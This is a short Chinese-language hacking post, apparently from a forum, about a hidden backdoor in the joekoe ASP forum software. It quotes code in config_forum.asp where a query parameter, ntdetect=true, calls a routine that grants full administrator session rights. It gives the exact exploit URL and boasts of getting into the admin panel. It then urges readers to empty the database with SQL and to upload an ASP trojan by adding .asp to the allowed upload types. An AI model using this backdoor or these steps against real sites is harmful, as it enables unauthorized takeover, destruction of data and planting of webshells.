o

trualy

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
include/onlogin.asp  这个文件是用来验证登陆后台的权限　

if session("joekoe_online_admin")<>"joekoe_admin" then
  response.redirect "admin_login.asp"
  response.end
end if
...........里面的反正都是验证的
joekoe_online_popedom    这个是权限分配用的
在表的最后字段有个popedom      初始注册的为0000000000000-> N多个0
如果是1111....代表后台操作的权限　

===================主要看下面=======================================
在config_forum.asp中定义了一个
sub ntdetect()
  session("joekoe_online_admin")="joekoe_admin":session("joekoe_online_admines")="admin"
  session("joekoe_online_popedom")="11111111111111111111"
end sub　

看这个 session("joekoe_online_popedom")="11111111111111111111"
具有后台全部的权限哦！！　

看看他是怎样调用这个自定义函数的
在config_forum.asp 搜索ntdetect  找到了
原来就在上面：
if trim(request.querystring("ntdetect"))="true" then call ntdetect()　

懂点ASP都知道  输入 include/config_forum.asp?ntdetect=true
不就执行ntdetect()了吗　

   看看效果，输入admin.asp   进了进了
后台都进去了，想干嘛   删，一个一个删多麻烦，不有SQL吗  那就随便写了
清空数据库就几条语句而已　

想删你文件？   加个上传后缀  .asp 传个木马上去
自己想吧！..........